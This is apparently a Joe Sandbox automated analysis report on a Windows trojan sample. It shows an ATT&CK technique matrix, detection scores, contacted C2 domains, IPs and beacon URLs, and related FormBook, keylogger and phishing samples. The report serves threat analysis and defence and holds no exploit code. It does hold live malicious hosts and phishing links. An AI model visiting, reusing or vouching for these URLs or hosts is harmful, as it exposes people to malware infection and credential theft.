Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	1 Abuse Elevation Control Mechanism	Security Account Manager	2 File and Directory Discovery	SMB/Windows Admin Shares	1 Email Collection	4 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	2 Valid Accounts	31 Obfuscated Files or Information	NTDS	116 System Information Discovery	Distributed Component Object Model	21 Input Capture	4 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	21 Access Token Manipulation	1 Software Packing	LSA Secrets	151 Security Software Discovery	SSH	3 Clipboard Data	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	312 Process Injection	1 DLL Side-Loading	Cached Domain Credentials	2 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	2 Valid Accounts	DCSync	3 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	2 Virtualization/Sandbox Evasion	Proc Filesystem	11 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	21 Access Token Manipulation	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	312 Process Injection	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
6ddrUd6iQo.exe	68%	Virustotal		Browse
6ddrUd6iQo.exe	58%	ReversingLabs	Win32.Trojan.Strab
6ddrUd6iQo.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Link
www.hpo0snermcvqv.xyz	1%	Virustotal	Browse
cooperativas.lat	4%	Virustotal	Browse
www.inride.top	2%	Virustotal	Browse
baseinvestments.site	1%	Virustotal	Browse
natroredirect.natrocdn.com	0%	Virustotal	Browse
techcadweb.tech	2%	Virustotal	Browse
www.techcadweb.tech	2%	Virustotal	Browse
www.inbet.company	0%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label	Link
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	0%	URL Reputation	safe
https://www.ecosia.org/newtab/	0%	URL Reputation	safe
https://ac.ecosia.org/autocomplete?q=	0%	URL Reputation	safe
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	0%	URL Reputation	safe
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	0%	URL Reputation	safe
https://duckduckgo.com/chrome_newtab	0%	Avira URL Cloud	safe
https://duckduckgo.com/ac/?q=	0%	Avira URL Cloud	safe
http://www.15827f0ea96ee84a.com/9uf2/?SXqH06e=Tjb20Msl4sgbUMPAv0cgLdvoJjlvR840pSXAvJDGRu8+pqajaKEFoYauxtPF4KhiJSnYn4AUVVoWqG6D5/7kjylfywLE97TnvLa2s9Ew2nrTmaz066FYaB4=&AV=_ng4uzR8Zz	0%	Avira URL Cloud	safe
http://cdn.jsinit.directfwd.com/sk-jspark_init.php	0%	Avira URL Cloud	safe
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	0%	Avira URL Cloud	safe
http://www.baseinvestments.site/1zzj/	0%	Avira URL Cloud	safe
http://www.techcadweb.tech/14e7/	100%	Avira URL Cloud	malware
https://duckduckgo.com/ac/?q=	0%	Virustotal		Browse
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	Avira URL Cloud	safe
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	0%	Virustotal		Browse
http://cdn.jsinit.directfwd.com/sk-jspark_init.php	12%	Virustotal		Browse
http://www.techcadweb.tech/14e7/?SXqH06e=bCPQ5+1rXgIzzb6Yab0pbAhhQb9XrByT/Ak2H+GAO5bcJYJuu6EdQZ+EA6E6dYH2KOSHyjKcRtCqIh6kAwLxr/W5k5rXUDR6Bybr1Ao3GXQhCERrhJ9UbaA=&AV=_ng4uzR8Zz	100%	Avira URL Cloud	malware
http://www.techcadweb.tech/14e7/	3%	Virustotal		Browse
http://www.hpo0snermcvqv.xyz	0%	Avira URL Cloud	safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	Virustotal		Browse
https://ventraip.com.au/favicon.ico	0%	Avira URL Cloud	safe
http://www.15827f0ea96ee84a.com/9uf2/	0%	Avira URL Cloud	safe
http://www.eastcoastev.site/51n1/	0%	Avira URL Cloud	safe
http://www.hpo0snermcvqv.xyz	1%	Virustotal		Browse
http://baseinvestments.site/1zzj/?AV=_ng4uzR8Zz&SXqH06e=e	0%	Avira URL Cloud	safe
https://ventraip.com.au/favicon.ico	0%	Virustotal		Browse
https://duckduckgo.com/chrome_newtab	0%	Virustotal		Browse
http://www.hpo0snermcvqv.xyz/nxj8/?SXqH06e=JnSQlo2AJaGm+nFT2qZSRg0fIOiYW2yRChe1TvEOMyeVSI4Rrbd3M1U4P44prWGvlp78DR0O0ozNIt3GVmTMd3t1XoLI1R7o2Qu96VhEkD058LDdwikyqZA=&AV=_ng4uzR8Zz	0%	Avira URL Cloud	safe
http://www.inride.top/pobq/	0%	Avira URL Cloud	safe
http://www.eastcoastev.site	0%	Avira URL Cloud	safe
http://www.baseinvestments.site/1zzj/?AV=_ng4uzR8Zz&SXqH06e=e+7rX/frfIk10QOuz43kkA+7jJ9/vO9/QWtHdTtOO6Fm9aJkeQOf2OoD1t74k7EvqDg8Zmex5vpF0dGn3lNO/doA4NH7zXjCLT1laLVyk0bFqCORK0S89RE=	0%	Avira URL Cloud	safe
https://badges.ausowned.com.au/07634	0%	Avira URL Cloud	safe
http://www.hpo0snermcvqv.xyz/nxj8/	0%	Avira URL Cloud	safe
http://www.inride.top/pobq/?SXqH06e=0hFZeB1J5YMps7YD9EXKzRFoue9yrlGg73wLiWYmmwVdUbyA0yCYARPd/TCJVzbB+Mjph3HYSufKySLgqUImG9FEAb3pqAbgiqKGJfzggFu5TBR26YX/ycI=&AV=_ng4uzR8Zz	0%	Avira URL Cloud	safe
http://www.eastcoastev.site/51n1/?AV=_ng4uzR8Zz&SXqH06e=GTW7gMD+qiwDmkYMJmUUrrCMtPJL2sno34c5EOl9BVUJx5mTrUvVWfi+3MCo3S0zEbpqipJYWNklsBw4Yc3dmLLAIpXZJumvdrAhXZ5L2dMToSPZFVVe9UQ=	0%	Avira URL Cloud	safe
https://badges.ausowned.com.au/07634	0%	Virustotal		Browse
http://www.hpo0snermcvqv.xyz/nxj8/	1%	Virustotal		Browse
http://www.inride.top/pobq/	1%	Virustotal		Browse
http://www.eastcoastev.site/51n1/	1%	Virustotal		Browse
http://www.rotaprefabrik.online/rr50/?AV=_ng4uzR8Zz&SXqH06e=2kOM/31TW1roA/W1co45WLRXgmahHcobiheM1q2t86GHiq/JR2HJqxRNoSYt1v1K2qoLuY73JnsiaWdINJegakBCvO0IhsrDF+fhoUhJ53IQt5p3geHx+pw=	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
www.hpo0snermcvqv.xyz	188.114.96.3	true	true	1%, Virustotal, Browse	unknown
cooperativas.lat	162.241.75.234	true	false	4%, Virustotal, Browse	unknown
www.eastcoastev.site	103.42.108.46	true	false		unknown
www.inride.top	162.254.38.5	true	false	2%, Virustotal, Browse	unknown
zhuancdn.pternistes.com	103.71.177.176	true	false		unknown
baseinvestments.site	66.235.200.145	true	false	1%, Virustotal, Browse	unknown
natroredirect.natrocdn.com	85.159.66.93	true	false	0%, Virustotal, Browse	unknown
techcadweb.tech	162.241.148.243	true	false	2%, Virustotal, Browse	unknown
www.inbet.company	unknown	unknown	true	0%, Virustotal, Browse	unknown
www.baseinvestments.site	unknown	unknown	true		unknown
www.15827f0ea96ee84a.com	unknown	unknown	true		unknown
www.techcadweb.tech	unknown	unknown	true	2%, Virustotal, Browse	unknown
www.rotaprefabrik.online	unknown	unknown	true		unknown
www.sdrynwhuf13.sbs	unknown	unknown	true		unknown
www.cooperativas.lat	unknown	unknown	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.15827f0ea96ee84a.com/9uf2/?SXqH06e=Tjb20Msl4sgbUMPAv0cgLdvoJjlvR840pSXAvJDGRu8+pqajaKEFoYauxtPF4KhiJSnYn4AUVVoWqG6D5/7kjylfywLE97TnvLa2s9Ew2nrTmaz066FYaB4=&AV=_ng4uzR8Zz	false	Avira URL Cloud: safe	unknown
http://www.baseinvestments.site/1zzj/	false	Avira URL Cloud: safe	unknown
http://www.techcadweb.tech/14e7/	false	3%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://www.techcadweb.tech/14e7/?SXqH06e=bCPQ5+1rXgIzzb6Yab0pbAhhQb9XrByT/Ak2H+GAO5bcJYJuu6EdQZ+EA6E6dYH2KOSHyjKcRtCqIh6kAwLxr/W5k5rXUDR6Bybr1Ao3GXQhCERrhJ9UbaA=&AV=_ng4uzR8Zz	false	Avira URL Cloud: malware	unknown
http://www.15827f0ea96ee84a.com/9uf2/	false	Avira URL Cloud: safe	unknown
http://www.eastcoastev.site/51n1/	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.hpo0snermcvqv.xyz/nxj8/?SXqH06e=JnSQlo2AJaGm+nFT2qZSRg0fIOiYW2yRChe1TvEOMyeVSI4Rrbd3M1U4P44prWGvlp78DR0O0ozNIt3GVmTMd3t1XoLI1R7o2Qu96VhEkD058LDdwikyqZA=&AV=_ng4uzR8Zz	false	Avira URL Cloud: safe	unknown
http://www.inride.top/pobq/	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.baseinvestments.site/1zzj/?AV=_ng4uzR8Zz&SXqH06e=e+7rX/frfIk10QOuz43kkA+7jJ9/vO9/QWtHdTtOO6Fm9aJkeQOf2OoD1t74k7EvqDg8Zmex5vpF0dGn3lNO/doA4NH7zXjCLT1laLVyk0bFqCORK0S89RE=	false	Avira URL Cloud: safe	unknown
http://www.hpo0snermcvqv.xyz/nxj8/	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.inride.top/pobq/?SXqH06e=0hFZeB1J5YMps7YD9EXKzRFoue9yrlGg73wLiWYmmwVdUbyA0yCYARPd/TCJVzbB+Mjph3HYSufKySLgqUImG9FEAb3pqAbgiqKGJfzggFu5TBR26YX/ycI=&AV=_ng4uzR8Zz	false	Avira URL Cloud: safe	unknown
http://www.eastcoastev.site/51n1/?AV=_ng4uzR8Zz&SXqH06e=GTW7gMD+qiwDmkYMJmUUrrCMtPJL2sno34c5EOl9BVUJx5mTrUvVWfi+3MCo3S0zEbpqipJYWNklsBw4Yc3dmLLAIpXZJumvdrAhXZ5L2dMToSPZFVVe9UQ=	false	Avira URL Cloud: safe	unknown
http://www.rotaprefabrik.online/rr50/?AV=_ng4uzR8Zz&SXqH06e=2kOM/31TW1roA/W1co45WLRXgmahHcobiheM1q2t86GHiq/JR2HJqxRNoSYt1v1K2qoLuY73JnsiaWdINJegakBCvO0IhsrDF+fhoUhJ53IQt5p3geHx+pw=	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://cdn.jsinit.directfwd.com/sk-jspark_init.php	wEnggOkwNlJAef.exe, 00000005.00000002.3516176243.0000000005E32000.00000004.80000000.00040000.00000000.sdmp, msinfo32.exe, 00000006.00000002.3512126162.0000000006142000.00000004.10000000.00040000.00000000.sdmp	false	12%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://duckduckgo.com/chrome_newtab	msinfo32.exe, 00000006.00000003.2378109254.0000000007DFD000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://duckduckgo.com/ac/?q=	msinfo32.exe, 00000006.00000003.2378109254.0000000007DFD000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	msinfo32.exe, 00000006.00000003.2378109254.0000000007DFD000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	msinfo32.exe, 00000006.00000003.2378109254.0000000007DFD000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	msinfo32.exe, 00000006.00000003.2378109254.0000000007DFD000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.ecosia.org/newtab/	msinfo32.exe, 00000006.00000003.2378109254.0000000007DFD000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.hpo0snermcvqv.xyz	wEnggOkwNlJAef.exe, 00000005.00000002.3516176243.00000000054C6000.00000004.80000000.00040000.00000000.sdmp, msinfo32.exe, 00000006.00000002.3512126162.00000000057D6000.00000004.10000000.00040000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://ventraip.com.au/favicon.ico	wEnggOkwNlJAef.exe, 00000005.00000002.3516176243.0000000005FC4000.00000004.80000000.00040000.00000000.sdmp, msinfo32.exe, 00000006.00000002.3513710027.0000000007AE0000.00000004.00000800.00020000.00000000.sdmp, msinfo32.exe, 00000006.00000002.3512126162.00000000062D4000.00000004.10000000.00040000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://baseinvestments.site/1zzj/?AV=_ng4uzR8Zz&SXqH06e=e	wEnggOkwNlJAef.exe, 00000005.00000002.3516176243.0000000005CA0000.00000004.80000000.00040000.00000000.sdmp, msinfo32.exe, 00000006.00000002.3512126162.0000000005FB0000.00000004.10000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ac.ecosia.org/autocomplete?q=	msinfo32.exe, 00000006.00000003.2378109254.0000000007DFD000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.eastcoastev.site	wEnggOkwNlJAef.exe, 00000005.00000002.3517475959.000000000740C000.00000040.80000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	msinfo32.exe, 00000006.00000003.2378109254.0000000007DFD000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://badges.ausowned.com.au/07634	wEnggOkwNlJAef.exe, 00000005.00000002.3516176243.0000000005FC4000.00000004.80000000.00040000.00000000.sdmp, msinfo32.exe, 00000006.00000002.3513710027.0000000007AE0000.00000004.00000800.00020000.00000000.sdmp, msinfo32.exe, 00000006.00000002.3512126162.00000000062D4000.00000004.10000000.00040000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	msinfo32.exe, 00000006.00000003.2378109254.0000000007DFD000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
162.241.148.243	techcadweb.tech	United States	46606	UNIFIEDLAYER-AS-1US	false
66.235.200.145	baseinvestments.site	United States	13335	CLOUDFLARENETUS	false
188.114.96.3	www.hpo0snermcvqv.xyz	European Union	13335	CLOUDFLARENETUS	true
162.254.38.5	www.inride.top	United States	13768	COGECO-PEER1CA	false
103.71.177.176	zhuancdn.pternistes.com	Hong Kong	55720	GIGABIT-MYGigabitHostingSdnBhdMY	false
103.42.108.46	www.eastcoastev.site	Australia	45638	SYNERGYWHOLESALE-APSYNERGYWHOLESALEPTYLTDAU	false
85.159.66.93	natroredirect.natrocdn.com	Turkey	34619	CIZGITR	false

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1486669
Start date and time:	2024-08-02 13:39:21 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 9m 36s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Run name:	Run with higher sleep bypass
Number of analysed new started processes analysed:	8
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	6ddrUd6iQo.exe renamed because original name is a hash value
Original Sample Name:	ee18930ee603d14401820554e2d003eb06efc51ee4b90071b178f6da05ae067b.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@7/5@10/7
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 98% Number of executed functions: 59 Number of non-executed functions: 275
Cookbook Comments:	Found application associated with file extension: .exe Sleeps bigger than 100000000ms are automatically reduced to 1000ms

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing disassembly code.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
07:41:35	API Interceptor	4776263x Sleep call for process: msinfo32.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
162.241.148.243	DRAFT CONTRACT COPY_938840.scr	Get hash	malicious	FormBook	Browse	www.techcadweb.tech/rlfw/
	http://elliot.technoexponent.net	Get hash	malicious	Unknown	Browse	elliot.technoexponent.net/
	ps_script.ps1	Get hash	malicious	Unknown	Browse	freelancerwebdesignerhyderabad.com/cgi-bin/S/
	ps_script.ps1	Get hash	malicious	Unknown	Browse	freelancerwebdesignerhyderabad.com/cgi-bin/S/
	ps_script.ps1	Get hash	malicious	Unknown	Browse	freelancerwebdesignerhyderabad.com/cgi-bin/S/
	sample2.doc	Get hash	malicious	Unknown	Browse	freelancerwebdesignerhyderabad.com/cgi-bin/S/
	form.doc	Get hash	malicious	Unknown	Browse	freelancerwebdesignerhyderabad.com/cgi-bin/S/
66.235.200.145	AWB NO. 077-57676135055.exe	Get hash	malicious	FormBook	Browse	www.lakemontbellevue.com/bjbg/
	DHL Receipt_AWB#20240079104.exe	Get hash	malicious	FormBook	Browse	www.lakemontbellevue.com/ld28/?3Xd=detQRJhNSOte/MMKAeFCHQdrYsI9TT+LmPx5A1J5xMe4V34+sX8EdyBejeqfNCZfKSqZdnV4VnFNmZ4/AzmN1DMS5R4a1wm07eTy015a8TIqAfj/mBukJiQ=&Cdl=szJ4
	INVOICE087667899.exe	Get hash	malicious	Unknown	Browse	heygirlisheeverythingyouwantedinaman.comheygirlisheeverythingyouwantedinaman.com:443
	2FcJgghyXg.exe	Get hash	malicious	FormBook	Browse	www.soccercitycupsc.com/us94/?FV9l7b=S5srMiwBCDtV4rjo3jAT9rEjkkSDttoSOLAmgXzTQBVP9tcOlEr2qFRjTuqDw5Sxe1FF&BbW=QzuhmF0pKL
	ClbrTLBbVA.exe	Get hash	malicious	FormBook	Browse	www.adornmentwithadrienne.com/ne28/?yXB=JRhSHg+E0kVeMb5bWxBNKjX7GZb/Gd7gTaCbDgRTO6UaOuEkMa6xiN+s4LYpa+moX3ut&DR-Hl=f48d7hbXPvmPj
	r5573XLX_Confirming_685738_Permiso.vbs	Get hash	malicious	FormBook	Browse	www.shivanshnegi.com/hb6q/?kF=SLfnpSH8JFkD4JBvPgRq/MrmccQ0IKCWuyGgdNK0iEg51HeS6g2oNSkb61BOtzoBwxfmw1AFCol6MwSDOKA9DD+yD/DKRM1OfQ==&LPW33a=EJ_Y5C3RY2AMjvtQ
	BBVA-Confirming_Facturas_Pagadas_al_Vencimiento.vbs	Get hash	malicious	FormBook	Browse	www.shivanshnegi.com/hb6q/?3t-_2h=lQe4u&_30_T=SLfnpSH8JFkD4JBvPgRq/MrmccQ0IKCWuyGgdNK0iEg51HeS6g2oNSkb61BOtzoBwxfmw1AFCol6MwSDOKA9DD+yD/DKRM1OfQ==
	GlobalImagingDocuments9575734549684.vbs	Get hash	malicious	FormBook	Browse	www.shivanshnegi.com/g0c0/?J1ZahCdL=C0KZfCw3M9dgcVMegUaXT5mHrabIsWwgKIwZghABK/zPnQmv2J3/nbZH+UKlayZCqk+j1NVXNAMuRNCfj24K4Q5P5C8DM0dqWdfKhTZFySIl&uEk=kKVhb1ODb
	0ySMPNiDoA.exe	Get hash	malicious	FormBook	Browse	www.theunstoppabletravelers.com/a19i/?4hkT=rLtsLZhSdQwFRkvaG8FjiaGEB8J9o/aSV6LeKN0wyHa1R2N5aTBKUDHw+apOLNME5B3p&aHzLRr=9rl0dna
	6014853.exe	Get hash	malicious	FormBook	Browse	www.firepowerexpo.com/f649/?Ih3=m1lqWHCBQ/kUfIId9G1Zl7+cXxQgMOESuv3uKkpy1j9VjbvHsanxuQVfMZjTZucRw3bqX9o71XHJz8Ptxs35IAYHht5fw0SXRQ==&FTBSzg=_AtxeQJqoYkM5z7B
188.114.96.3	QUOTATION_JULQTRA071244#U00faPDF.scr	Get hash	malicious	Unknown	Browse	filetransfer.io/data-package/eivFTmO7/download
	efhUMsfsu8.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	152810cm.nyashka.top/EternaljsRequestLowGameAsyncTrafficUploads.php
	2024MSASI056553A.exe	Get hash	malicious	FormBook	Browse	www.ffi07s.xyz/y7ar/
	n6o0pd9pZC.exe	Get hash	malicious	Xmrig	Browse	joxi.net/4Ak49WQH0GE3Nr.mp3
	QUOTATION_AUGQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	filetransfer.io/data-package/5gNqQuTk/download
	PO-00349.xls	Get hash	malicious	Remcos	Browse	fd.ax/2Jv
	r777528623004-FedEx-Shipping-Label.exe	Get hash	malicious	FormBook	Browse	www.hoth.systems/dz16/?Rl=YTfPKPh8&FDHHVRl=F+NQSoF3jdqWh1Hot5q52NaL0wDGBqmGGMt3Zl9TSOZ+DfGDY0KPapQH24rOzojS/LW2OaRQ8w==
	mtTw7o41OC.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	www.ninunveiled.shop/y2xs/
	swift copy.exe	Get hash	malicious	FormBook	Browse	www.ffi07s.xyz/y7ar/
	http://memberships.garenna.id.vn/css/hitcount.jsp	Get hash	malicious	Unknown	Browse	memberships.garenna.id.vn/images/spin-title.png

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
natroredirect.natrocdn.com	Enquiry24-789.exe	Get hash	malicious	FormBook	Browse	85.159.66.93
	SOA.exe	Get hash	malicious	FormBook	Browse	85.159.66.93
	draft Proforma Invoice.exe	Get hash	malicious	FormBook	Browse	85.159.66.93
	Purchase Order 2.exe	Get hash	malicious	FormBook	Browse	85.159.66.93
	A.W.B.exe	Get hash	malicious	FormBook	Browse	85.159.66.93
	TT Application copy.exe	Get hash	malicious	FormBook	Browse	85.159.66.93
	PO 1024.exe	Get hash	malicious	FormBook	Browse	85.159.66.93
	SecuriteInfo.com.Win32.PWSX-gen.18110.20008.exe	Get hash	malicious	FormBook	Browse	85.159.66.93
	nK1Y86mbzfbkwpB.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	85.159.66.93
	Petromasila 16072024.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	85.159.66.93
www.hpo0snermcvqv.xyz	rScanned_009328.exe	Get hash	malicious	FormBook	Browse	188.114.97.3
zhuancdn.pternistes.com	502407267 RUAG FOODPLAZA.exe	Get hash	malicious	DarkTortilla, FormBook	Browse	103.71.177.176

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	SNu4RXZpoS.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	104.26.12.205
	n2SgyJt0GY.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	KI5aMjoIXM.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	5VrHP9bbzO.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
	CZi90pCBqc.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse	188.114.96.3
	Payment Swift_PDF.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	tmp4682.html	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	cKmmceC6UO.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse	188.114.96.3
	w3xlXm0r8W.exe	Get hash	malicious	FormBook	Browse	104.21.79.53
	https://www.uploadhub.io/kZ6xQJLbaWK4vPM/file	Get hash	malicious	Unknown	Browse	188.114.97.3
COGECO-PEER1CA	2024MSASI056553A.exe	Get hash	malicious	FormBook	Browse	162.254.38.56
	RFQ31072024_August order_pdf.bat.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	66.223.49.49
	swift copy.exe	Get hash	malicious	FormBook	Browse	162.254.38.56
	1722353646a72610b15e2e0dc8938a613e79a468d2bd6667bbb9851353fe585f2df701b9ea357.dat-decoded.exe	Get hash	malicious	AgentTesla	Browse	64.34.65.25
	orden de compra BF-161000401.vbs	Get hash	malicious	AgentTesla	Browse	64.34.65.25
	rScanned_009328.exe	Get hash	malicious	FormBook	Browse	162.254.38.5
	TT51109240018351.exe	Get hash	malicious	FormBook	Browse	162.254.38.56
	SHIPPING ADVICE MBL+HBL.exe	Get hash	malicious	FormBook	Browse	162.254.38.56
	Final Shipping Document.exe	Get hash	malicious	FormBook	Browse	162.254.38.56
	New Order#9.exe	Get hash	malicious	FormBook	Browse	162.254.38.56
UNIFIEDLAYER-AS-1US	https://hij.koc.mybluehost.me/Z/	Get hash	malicious	Unknown	Browse	162.241.217.57
	https://zjnlm.vk.com////away.php?to=https://brandequity.economictimes.indiatimes.com/etl.php?url=radiouserdadambato.com/dayo/vwxmp/c2N1bWluZ3NAdG1oY2MuY29t	Get hash	malicious	HTMLPhisher	Browse	192.185.187.154
	http://www.craft.com.br	Get hash	malicious	Unknown	Browse	162.241.62.70
	http://www.coinbase-user-vlogin.tradewindpropertiescr.com/	Get hash	malicious	Unknown	Browse	192.185.198.44
	https://nym1-ib.adnxs.com/click2?e=wqT_3QKZAfBDmQAAAAMAxBkFAQiIoM-zBhCJo_aKxfvCoioYgeDOtoOlx-YOIIy_9g4omAIwuGg4kQRAuq2d7gFI8opOUABaA1VTRGIBBYhoAXABeJmgZ4ABAIgBAZABApgBBaABAqkBNzgR_dr64z-xAREKLLkBAAAAQDMz_z_BAREUAMkVChzYAY69AuABAA../s=fd215fa3f6c45164ae9790e4c04714dce2356091/bcr=AAAAAAAA8D8=/pp=0.62/bn=0/clickenc=//lilypet.com.br/rarr/jhfhnfknf/aWFuLnJvZ2Vyc0BsbWcubmV0	Get hash	malicious	EvilProxy	Browse	192.185.218.163
	phish_alert_sp2_2.0.0.0 (36).eml	Get hash	malicious	HTMLPhisher	Browse	192.185.24.172
	Holland LP_Open_Invoices.pdf	Get hash	malicious	Unknown	Browse	192.185.92.7
	JzWHmWfXBX.exe	Get hash	malicious	AgentTesla	Browse	162.241.62.63
	52i8S0bosh.exe	Get hash	malicious	AgentTesla	Browse	162.241.62.63
	https://www.google.com/url?q=//www.google.co.kr/amp/s/eoVRpfpJzWDN5VB.ubinet.com.br/xitigebeuwhdh/beelachaieu/ouruhheygv/amVzc2ljYS50YW5Ac2FmcmFuZ3JvdXAuY29t	Get hash	malicious	Phisher	Browse	50.116.113.154
CLOUDFLARENETUS	SNu4RXZpoS.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	104.26.12.205
	n2SgyJt0GY.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	KI5aMjoIXM.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	5VrHP9bbzO.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
	CZi90pCBqc.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse	188.114.96.3
	Payment Swift_PDF.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	tmp4682.html	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
